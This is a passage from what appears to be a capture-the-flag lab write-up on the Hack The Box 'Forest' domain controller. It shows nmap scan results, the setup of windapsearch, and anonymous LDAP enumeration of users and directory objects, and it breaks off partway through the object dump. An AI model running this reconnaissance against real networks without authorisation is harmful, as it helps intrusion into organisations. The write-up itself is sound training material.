Information gathering
An nmap scan identifies the domain controller (10.10.10.161):
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-23 14:32:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1296/tcp filtered dproxy
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Aggressive OS guesses: Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Server 2012 (92%), Microsoft Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%), Microsoft Windows Server 2016 build 10586 - 14393 (92%), Microsoft Windows Server 2012 or Server 2012 R2 (91%), Microsoft Windows 10 1507 - 1607 (90%), Microsoft Windows Server 2016 (90%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Next, check whether LDAP allows anonymous bind, using windapsearch on Kali.
Installing windapsearch
https://github.com/Mephostophiles/windapsearch
pip install python-ldap #or apt-get install python-ldap
If installing python-ldap fails, install the build dependencies first:
apt-get update
apt-get install libsasl2-dev python3-dev libldap2-dev libssl-dev
Command: python windapsearch.py -d htb.local --dc-ip 10.10.10.161 -U
-U enumerates users. The output shows that LDAP accepts an anonymous bind and that users can be enumerated without credentials.
Scan output:
python windapsearch.py -d htb.local --dc-ip 10.10.10.161 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.161
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[+] Found 28 users:
cn: Guest
cn: DefaultAccount
cn: Exchange Online-ApplicationAccount
userPrincipalName: Exchange_Online-ApplicationAccount@htb.local
cn: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}
userPrincipalName: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local
cn: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}
userPrincipalName: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local
cn: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}
userPrincipalName: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local
cn: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}
userPrincipalName: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local
cn: Migration.8f3e7716-2011-43e4-96b1-aba62d229136
userPrincipalName: Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local
cn: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042
userPrincipalName: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local
cn: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}
userPrincipalName: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local
cn: SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}
userPrincipalName: SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.local
cn: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}
userPrincipalName: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.local
cn: HealthMailboxc3d7722415ad41a5b19e3e00e165edbe
userPrincipalName: HealthMailboxc3d7722415ad41a5b19e3e00e165edbe@htb.local
cn: HealthMailboxfc9daad117b84fe08b081886bd8a5a50
userPrincipalName: HealthMailboxfc9daad117b84fe08b081886bd8a5a50@htb.local
cn: HealthMailboxc0a90c97d4994429b15003d6a518f3f5
userPrincipalName: HealthMailboxc0a90c97d4994429b15003d6a518f3f5@htb.local
cn: HealthMailbox670628ec4dd64321acfdf6e67db3a2d8
userPrincipalName: HealthMailbox670628ec4dd64321acfdf6e67db3a2d8@htb.local
cn: HealthMailbox968e74dd3edb414cb4018376e7dd95ba
userPrincipalName: HealthMailbox968e74dd3edb414cb4018376e7dd95ba@htb.local
cn: HealthMailbox6ded67848a234577a1756e072081d01f
userPrincipalName: HealthMailbox6ded67848a234577a1756e072081d01f@htb.local
cn: HealthMailbox83d6781be36b4bbf8893b03c2ee379ab
userPrincipalName: HealthMailbox83d6781be36b4bbf8893b03c2ee379ab@htb.local
cn: HealthMailboxfd87238e536e49e08738480d300e3772
userPrincipalName: HealthMailboxfd87238e536e49e08738480d300e3772@htb.local
cn: HealthMailboxb01ac647a64648d2a5fa21df27058a24
userPrincipalName: HealthMailboxb01ac647a64648d2a5fa21df27058a24@htb.local
cn: HealthMailbox7108a4e350f84b32a7a90d8e718f78cf
userPrincipalName: HealthMailbox7108a4e350f84b32a7a90d8e718f78cf@htb.local
cn: HealthMailbox0659cc188f4c4f9f978f6c2142c4181e
userPrincipalName: HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.local
cn: Sebastien Caron
userPrincipalName: sebastien@htb.local
cn: Lucinda Berger
userPrincipalName: lucinda@htb.local
cn: Andy Hislip
userPrincipalName: andy@htb.local
cn: Mark Brandt
userPrincipalName: mark@htb.local
cn: Santi Rodriguez
userPrincipalName: santi@htb.local
Next, query with the filter objectClass=* in windapsearch to list all other objects in the directory.
Command: python windapsearch.py -d htb.local --dc-ip 10.10.10.161 --custom "objectClass=*"
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.161
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Performing custom lookup with filter: "objectClass=*"
[+] Found 312 results:
DC=htb,DC=local
CN=Users,DC=htb,DC=local
CN=Allowed RODC Password Replication Group,CN=Users,DC=htb,DC=local
CN=Denied RODC Password Replication Group,CN=Users,DC=htb,DC=local
CN=Read-only Domain Controllers,CN=Users,DC=htb,DC=local
CN=Enterprise Read-only Domain Controllers,CN=Users,DC=htb,DC=local
CN=Cloneable Domain Controllers,CN=Users,DC=htb,DC=local
CN=Protected Users,CN=Users,DC=htb,DC=local
CN=Key Admins,CN=Users,DC=htb,DC=local
CN=Enterprise Key Admins,CN=Users,DC=htb,DC=local
CN=DnsAdmins,CN=Users,DC=htb,DC=local
CN=DnsUpdateProxy,CN=Users,DC=htb,DC=local
CN=Exchange Online-ApplicationAccount,CN=Users,DC=htb,DC=local
CN=SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1},CN=Users,DC=htb,DC=local
CN=SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c},CN=Users,DC=htb,DC=local
CN=SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9},CN=Users,DC=htb,DC=local
CN=DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852},CN=Users,DC=htb,DC=local
CN=Migration.8f3e7716-2011-43e4-96b1-aba62d229136,CN=Users,DC=htb,DC=local
CN=FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042,CN=Users,DC=htb,DC=local
CN=SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201},CN=Users,DC=htb,DC=local
CN=SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA},CN=Users,DC=htb,DC=local
CN=SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9},CN=Users,DC=htb,DC=local
CN=Administrator,CN=Users,DC=htb,DC=local
CN=Guest,CN=Users,DC=htb,DC=local
CN=DefaultAccount,CN=Users,DC=htb,DC=local
CN=krbtgt,CN=Users,DC=htb,DC=local
CN=Domain Computers,CN=Users,DC=htb,DC=local
CN=Domain Controllers,CN=Users,DC=htb,DC=local
CN=Schema Admins,CN=Users,DC=htb,DC=local
CN=Enterprise Admins,CN=Users,DC=htb,DC=local
CN=Cert Publishers,CN=Users,DC=htb,DC=local
CN=Domain Admins,CN=Users,DC=htb,DC=local
CN=Domain Users,CN=Users,DC=htb,DC=local
CN=Domain Guests,CN=Users,DC=htb,DC=local
CN=Group Policy Creator Owners,CN=Users,DC=htb,DC=local
CN=RAS and IAS Servers,CN=Users,DC=htb,DC=local
CN=Computers,DC=htb,DC=local
CN=EXCH01,CN=Computers,DC=htb,DC=local
OU=Domain Controllers,DC=htb,DC=local
CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
CN=RID Set,CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
CN=DFSR-LocalSettings,CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
CN=Domain System Volume,CN=DFSR-LocalSettings,CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
CN=SYSVOL Subscription,CN=Domain System Volume,CN=DFSR-LocalSettings,CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
CN=System,DC=htb,DC=local
CN=WinsockServices,CN=System,DC=htb,DC=local
CN=RpcServices,CN=System,DC=htb,DC=local
CN=FileLinks,CN=System,DC=htb,DC=local
CN=VolumeTable,CN=FileLinks,CN=System,DC=htb,DC=local
CN=ObjectMoveTable,CN=FileLinks,CN=System,DC=htb,DC=local
CN=Default Domain Policy,CN=System,DC=htb,DC=local
CN=AppCategories,CN=Default Domain Policy,CN=System,DC=htb,DC=local
CN=RID Manager$,CN=System,DC=htb,DC=local
CN=Meetings,CN=System,DC=htb,DC=local
CN=Policies,CN=System,DC=htb,DC=local
CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=htb,DC=local
CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=htb,DC=local
CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=@,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=A.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=B.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=C.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=D.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=E.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=F.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=G.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=H.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=I.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=J.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=K.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=L.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
DC=M.ROOT-SERVERS.NET,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=htb,DC=local
CN=RAS and IAS Servers Access Check,CN=System,DC=htb,DC=local
CN=File Replication Service,CN=System,DC=htb,DC=local
CN=Dfs-Configuration,CN=System,DC=htb,DC=local
CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecPolicy{72385230-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecISAKMPPolicy{72385231-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{72385232-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{59319BE2-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{594272E2-071D-11D3-AD22-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNegotiationPolicy{72385233-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecFilter{7238523A-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNegotiationPolicy{59319BDF-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNegotiationPolicy{7238523B-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecFilter{72385235-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecPolicy{72385236-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecISAKMPPolicy{72385237-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{59319C04-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNegotiationPolicy{59319C01-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecPolicy{7238523C-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecISAKMPPolicy{7238523D-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{7238523E-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{59319BF3-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{594272FD-071D-11D3-AD22-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNegotiationPolicy{7238523F-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNegotiationPolicy{59319BF0-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=ipsecNFA{6A1F5C6F-72B7-11D2-ACF0-0060B0ECCA17},CN=IP Security,CN=System,DC=htb,DC=local
CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=local
CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=local
CN=Content,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=local
CN=SYSVOL Share,CN=Content,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=local
CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=local
CN=FOREST,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=htb,DC=local
CN=AdminSDHolder,CN=System,DC=htb,DC=local
CN=ComPartitions,CN=System,DC=htb,DC=local
CN=ComPartitionSets,CN=System,DC=htb,DC=local
CN=WMIPolicy,CN=System,DC=htb,DC=local
CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6E157EDF-4E72-4052-A82A-EC3F91021A22,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=ab402345-d3c3-455d-9ff7-40268a1099b6,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=bab5f54d-06c8-48de-9b87-d78b796564e4,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=f3dd09dd-25e8-4f9c-85df-12d6d2f2f2f5,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=2416c60a-fe15-4d7a-a61e-dffd5df864d3,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=7868d4c8-ac41-4e05-b401-776280e8e9f1,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=860c36ed-5241-4c62-a18b-cf6ff9994173,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=0e660ea3-8a5e-4495-9ad7-ca1bd4638f9e,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=a86fe12a-0f62-4e2a-b271-d27f601f8182,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=d85c0bfd-094f-4cad-a2b5-82ac9268475d,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6ada9ff7-c9df-45c1-908e-9fef2fab008a,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=10b3ad2a-6883-4fa7-90fc-6377cbdc1b26,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=98de1d3e-6611-443b-8b4e-f4337f1ded0b,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=f607fd87-80cf-45e2-890b-6cf97ec0e284,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=9cac1f66-2167-47ad-a472-2a13251310e4,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6ff880d6-11e7-4ed1-a20f-aac45da48650,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=446f24ea-cfd5-4c52-8346-96e170bcb912,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=51cba88b-99cf-4e16-bef2-c427b38d0767,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=a3dac986-80e7-4e59-a059-54cb1ab43cb9,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=293f0798-ea5c-4455-9f5d-45f33a30703b,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=5c82b233-75fc-41b3-ac71-c69592e6bf15,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=7ffef925-405b-440a-8d58-35e8cd6e98c3,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=4dfbb973-8a62-4310-a90c-776e00f83222,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=8437C3D8-7689-4200-BF38-79E4AC33DFA0,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=7cfb016c-4f87-4406-8166-bd9df943947f,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=f7ed4553-d82b-49ef-a839-2f38a36bb069,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=8ca38317-13a4-4bd4-806f-ebed6acb5d0c,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=3c784009-1f57-4e2a-9b04-6915c9e71961,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5678-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5679-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd567a-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd567b-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd567c-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd567d-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd567e-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd567f-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5680-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5681-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5682-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5683-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5684-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5685-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5686-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5687-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5688-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd5689-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd568a-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd568b-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd568c-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=6bcd568d-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=3051c66f-b332-4a73-9a20-2d6a7d6e6a1c,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=3e4f4182-ac5d-4378-b760-0eab2de593e2,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=c4f17608-e611-11d6-9793-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=13d15cf0-e6c8-11d6-9793-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=8ddf6913-1c7b-4c59-a5af-b9ca3b3d2c4c,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=dda1d01d-4bd7-4c49-a184-46f9241b560e,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=a1789bfb-e0a2-4739-8cc0-e77d892d080a,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=61b34cb0-55ee-4be9-b595-97810b92b017,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=57428d75-bef7-43e1-938b-2e749f5a8d56,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=ebad865a-d649-416f-9922-456b53bbb5b8,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=0b7fb422-3609-4587-8c2e-94b10f67d1bf,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=2951353e-d102-4ea5-906c-54247eeec741,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=71482d49-8870-4cb3-a438-b6fc9ec35d70,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=aed72870-bf16-4788-8ac7-22299c8207f1,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=f58300d1-b71a-4DB6-88a1-a8b9538beaca,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=231fb90b-c92a-40c9-9379-bacfc313a3e3,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=4aaabc3a-c416-4b9c-a6bb-4b453ab1c1f0,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=9738c400-7795-4d6e-b19d-c16cd6486166,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=de10d491-909f-4fb0-9abb-4b7865c0fe80,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=b96ed344-545a-4172-aa0c-68118202f125,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=4c93ad42-178a-4275-8600-16811d28f3aa,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=c88227bc-fcca-4b58-8d8a-cd3d64528a02,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=5e1574f6-55df-493e-a671-aaeffca6a100,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=d262aae8-41f7-48ed-9f35-56bbb677573d,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=82112ba0-7e4c-4a44-89d9-d46c9612bf91,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=c3c927a6-cc1d-47c0-966b-be8f9b63d991,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=54afcfb9-637a-4251-9f47-4d50e7021211,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=f4728883-84dd-483c-9897-274f2ebcf11e,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=ff4f9d27-7157-4cb0-80a9-5d6f2b14c8ff,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=83C53DA7-427E-47A4-A07A-A324598B88F7,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=C81FC9CC-0130-4FD1-B272-634D74818133,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=E5F9E791-D96D-4FC9-93C9-D53E1DC439BA,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=e6d5fd00-385d-4e65-b02d-9da3493ed850,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=3a6b3fbf-3168-4312-a10d-dd5b3393952d,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=7F950403-0AB3-47F9-9730-5D7B0269F9BD,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=434bb40d-dbc9-4fe7-81d4-d57229f7b080,CN=Operations,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=Windows2003Update,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=ActiveDirectoryUpdate,CN=DomainUpdates,CN=System,DC=htb,DC=local
CN=BCKUPKEY_bcb64993-1db6-45d5-9b0d-b8186e8ee6a4 Secret,CN=System,DC=htb,DC=local
CN=BCKUPKEY_P Secret,CN=System,DC=htb,DC=local
CN=BCKUPKEY_b5b09264-b153-45ba-9501-e0f2b84c57a7 Secret,CN=System,DC=htb,DC=local
CN=BCKUPKEY_PREFERRED Secret,CN=System,DC=htb,DC=local
CN=Password Settings Container,CN=System,DC=htb,DC=local
CN=PSPs,CN=System,DC=htb,DC=local
CN=Server,CN=System,DC=htb,DC=local
CN=LostAndFound,DC=htb,DC=local
CN=Infrastructure,DC=htb,DC=local
CN=ForeignSecurityPrincipals,DC=htb,DC=local
CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=htb,DC=local
CN=S-1-5-7,CN=ForeignSecurityPrincipals,DC=htb,DC=local
CN=S-1-1-0,CN=ForeignSecurityPrincipals,DC=htb,DC=local
CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=htb,DC=local
CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=htb,DC=local
CN=S-1-5-17,CN=ForeignSecurityPrincipals,DC=htb,DC=local
CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailboxc3d7722415ad41a5b19e3e00e165edbe,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=ExchangeActiveSyncDevices,CN=HealthMailboxc3d7722415ad41a5b19e3e00e165edbe,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=EASProbeDeviceType§EASProbeDeviceId141,CN=ExchangeActiveSyncDevices,CN=HealthMailboxc3d7722415ad41a5b19e3e00e165edbe,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailboxfc9daad117b84fe08b081886bd8a5a50,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=ExchangeActiveSyncDevices,CN=HealthMailboxfc9daad117b84fe08b081886bd8a5a50,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=EASProbeDeviceType§EASProbeDeviceId141,CN=ExchangeActiveSyncDevices,CN=HealthMailboxfc9daad117b84fe08b081886bd8a5a50,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailboxc0a90c97d4994429b15003d6a518f3f5,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailbox670628ec4dd64321acfdf6e67db3a2d8,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailbox968e74dd3edb414cb4018376e7dd95ba,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
